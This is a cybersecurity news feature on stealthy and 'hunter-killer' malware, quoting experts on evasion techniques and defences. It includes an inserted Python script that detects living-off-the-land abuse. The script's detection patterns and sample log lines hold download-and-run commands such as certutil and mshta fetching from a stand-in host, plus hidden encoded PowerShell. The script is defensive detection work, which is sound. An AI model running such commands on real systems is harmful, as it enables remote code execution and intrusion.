Stealthy malware: The threats hiding in plain sight


As security systems and practices improve, criminals are using AI and other technology to super-charge malware so it can hide in plain sight. Recently, experts raised concerns over the rise of “hunter-killer malware”, a specific strain of malicious software that targets security tools on a compromised network and disables them.

More than two-thirds of recorded malware now uses stealth-oriented techniques, per research by Picus Security. Approximately 70% of malware samples the firm analyzed were found actively hiding from security teams, employing methods to persist in networks and dodge common security tools.

Amid this concerning rise in stealthy malware, what do firms need to look out for and what tools and techniques can be used to detect and mitigate it?

How does stealthy malware avoid detection?

Stealthy malware is increasingly able to avoid detection by traditional security measures. This type of malware often uses advanced techniques to hide, making it difficult for companies to identify and take action. 

Threat actors initially avoided detection by creating malware that could evade antimalware and antivirus programs, using methods such as changing its code and encrypting itself, says Matt Aldridge, principal solutions consultant at OpenText Cybersecurity. “But as technology has advanced, it has become more sophisticated and harder to detect and manage by IT teams.”

For example, it can impersonate legitimate tools, minimizing its footprint in the target system, says Dominik Birgelen, CEO of oneclick AG.

Stealthy malware has evolved from “simple obfuscation techniques” to “highly sophisticated methods” such as fileless malware and mimicking legitimate processes, says Ramprakash Ramamoorthy, director of research at Zoho and ManageEngine. “Fileless attacks include processes that reside only in memory, leaving no footprints for disk-based security systems to catch. This malware also mimics legitimate processes by blending in with normal system behavior and latching onto trusted processes to avoid suspicion.”

Stealthy malware often enters systems when users click on phishing links, download from untrusted sources, or connect to random public internet networks, says Ramamoorthy. “Once inside, stealthy malware often lies dormant for extended periods. It might slowly steal data, establish a persistent foothold, or wait for a trigger to unleash more damaging payloads.”

The dangers of stealthy malware

Stealthy malware is particularly dangerous because its hidden nature allows attackers to operate unnoticed for long periods of time. The malware can change its code and appearance with each infection, making it more challenging for traditional security solutions to identify and block it based on known signatures, says Birgelen.

When attackers remain undetected, they can carry out malicious activities on a larger scale, Birgelen says. “What's really tricky is how this malware can wear the disguise of legitimate tools, making it a real challenge to notice if our security defenses are actually down. It's like trying to find a needle in a haystack, except the needle keeps changing its shape and color.”

Aldridge describes how malware variants have advanced capabilities, including using “living off the land” techniques – harnessing existing tools in the environment for malicious use. “These techniques can enable them to stealthily discover the network, enumerate security policies, modify system configurations and move laterally without the need for any new code in the environment. Additionally, advanced rootkit technology is used to hide deep within or below the operating system.”

Alex Holland, senior malware analyst in the HP Wolf Security threat research team, describes how cyber-criminals have changed the way Raspberry Robin malware is spreading. “Threat actors have shifted to using highly obfuscated Windows Script Files (.wsf) with a range of anti-analysis and virtual machine detection techniques. 

“This has made Raspberry Robin much harder to spot, triage, and protect against. In fact, currently the Windows Script loader is poorly detected by antivirus scanners on VirusTotal, and some samples are not being detected at all.”
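The two behaviours described above, "living off the land" with signed Windows binaries and loaders delivered as obfuscated Windows Script Files, leave little for a file scanner to match on, but they still show up as process-creation events. The script below is an added example, not code from the article, HP Wolf Security or any of the experts quoted: it runs a few defender-side heuristics over constructed process-creation log lines (the `timestamp|parent_image|image|command_line` format and every sample event are made up for the example, and the rule thresholds are assumptions a SOC would tune to its own baseline).

```python
"""Heuristic triage of process-creation events for living-off-the-land (LOTL)
and script-host abuse. Added example for this article; not code from any
vendor or from the experts quoted. Log format and sample events are constructed."""
import re
from collections import namedtuple

Event = namedtuple("Event", "ts parent image cmdline")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXT = re.compile(r"\.(wsf|vbs|vbe|js|jse)\b", re.I)
# Paths an ordinary user can write to: profile sub-folders and temp directories.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\|\\temp\\", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Signed Windows binaries that can fetch or run remote content (the LOTL pattern).
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode", re.I),
    "mshta.exe": re.compile(r"https?://", re.I),
    "regsvr32.exe": re.compile(r"/i:https?://", re.I),
    "bitsadmin.exe": re.compile(r"/transfer", re.I),
}
ENCODED_PS = re.compile(r"-(e|ec|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse(line):
    # Constructed format: timestamp|parent_image|image|command_line
    ts, parent, image, cmdline = line.rstrip("\n").split("|", 3)
    return Event(ts, parent, image, cmdline)


def rules_for(ev):
    """Return the names of every heuristic the event trips (empty list if none)."""
    img, par = basename(ev.image), basename(ev.parent)
    hits = []
    if img in SCRIPT_HOSTS and SCRIPT_EXT.search(ev.cmdline) and USER_WRITABLE.search(ev.cmdline):
        hits.append("script_host_from_user_path")
    if par in OFFICE_PARENTS and img in SHELLS:
        hits.append("office_spawned_shell")
    pattern = LOLBIN_PATTERNS.get(img)
    if pattern and pattern.search(ev.cmdline):
        hits.append("lolbin_remote_content")
    if img in {"powershell.exe", "pwsh.exe"} and ENCODED_PS.search(ev.cmdline):
        hits.append("encoded_or_hidden_powershell")
    return hits


def scan(lines):
    """Map each event's timestamp to the rules it triggered; clean events are omitted."""
    findings = {}
    for line in lines:
        if not line.strip():
            continue
        ev = parse(line)
        hits = rules_for(ev)
        if hits:
            findings[ev.ts] = hits
    return findings


# Constructed sample telemetry; the base64 blob decodes to the harmless "echo hi".
SAMPLE_EVENTS = r"""
2024-03-01T10:00:00Z|C:\Windows\explorer.exe|C:\Windows\System32\wscript.exe|wscript.exe //B "C:\Users\alice\Downloads\invoice.wsf"
2024-03-01T10:01:00Z|C:\Windows\explorer.exe|C:\Windows\System32\wscript.exe|wscript.exe "C:\Program Files\Vendor\maintenance.vbs"
2024-03-01T10:02:00Z|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\cmd.exe|cmd.exe /c start notepad.exe
2024-03-01T10:03:00Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil -urlcache -split -f http://example.invalid/p.txt C:\Users\alice\AppData\Local\Temp\p.txt
2024-03-01T10:04:00Z|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -enc ZQBjAGgAbwAgAGgAaQA=
2024-03-01T10:05:00Z|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
2024-03-01T10:06:00Z|C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe http://example.invalid/page.hta
"""

if __name__ == "__main__":
    for ts, rules in scan(SAMPLE_EVENTS.splitlines()).items():
        print(ts, ", ".join(rules))
```

The point of keying on parent/child relationships and command-line shape rather than file hashes is that the script host, `certutil` and `powershell` are all legitimate signed binaries, so a hash-based or signature-based control has nothing to block; what is anomalous is the context (a script run from a Downloads folder, a word processor spawning a shell, a hidden encoded PowerShell session). Expect benign hits on the first run and add allow-list conditions for known administrative jobs before alerting on these.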

Raspberry Robin can be used to download other malware families, Holland says. “This means threat actors can compromise organizations undetected, before delivering malware such as SocGholish, Cobalt Strike, IcedID, BumbleBee, and Truebot, as well as disruptive human-operated ransomware attacks that steal, lock access to data, and halt operations.”

Holland recently analyzed a DarkGate PDF campaign which evaded detection by proxying links via advertising networks. “Each malicious link was obfuscated behind an advertising link, which helped cybercriminals to evade detection and even capture analytics about victims.”

Novel detection methodology for stealthy malware

Although it presents a real threat, businesses can mitigate stealthy malware with the right tools and techniques. The first step for any security team is to maintain robust security hygiene, says Boris Cipot, senior security engineer at the Synopsys Software Integrity Group. This includes promptly patching systems and software to address vulnerabilities, he says. 

Maintaining strict authentication and authorization protocols coupled with vigilant monitoring helps detect any unusual access to systems and data. Meanwhile, monitoring email traffic, particularly scrutinizing attachments and links, is “crucial”, says Cipot. 

Birgelen advises businesses to adopt zero trust architecture (ZTA). “We're talking about a mindset where we don't automatically trust anyone, whether they're inside the organization or coming from the outside.”

While ZTA isn’t tailor-made for tackling stealthy malware head-on, Birgelen calls it “a real game-changer” in managing the risks associated with it.

Many organizations are adopting AI-based threat detection tools and implementing tiered architectures. This sees applications arranged into logical and physical computing tiers to safeguard against stealthy malware, says Del Heppenstall, partner and head of cyber at KPMG UK. 

“These architectures ensure that software capable of tampering with threat detection capabilities cannot do so without authorized human intervention,” Heppenstall explains. “Measures such as employing two-factor authentication or implementing server-side control modifications, such as limiting access to management software, are examples of this."

Overarching this, it’s also important to focus on employee education. This is something that should “underscore all effective cyber resilience and data protection strategies”, Aldridge says. 

Businesses should have security awareness training programs to inform and educate employees on the latest threats in real-time, including information security, social engineering, malware, and industry-specific compliance topics, he says. “Phishing simulations can also be deployed to automatically schedule vulnerable users for re-education should any training issues be identified.”

Kate O'Flaherty

Kate O'Flaherty is a freelance journalist with well over a decade's experience covering cyber security and privacy for publications including Wired, Forbes, the Guardian, the Observer, Infosecurity Magazine and the Times. Within cyber security and privacy, her specialist areas include critical national infrastructure security, cyber warfare, application security and regulation in the UK and the US amid increasing data collection by big tech firms such as Facebook and Google. You can follow Kate on Twitter.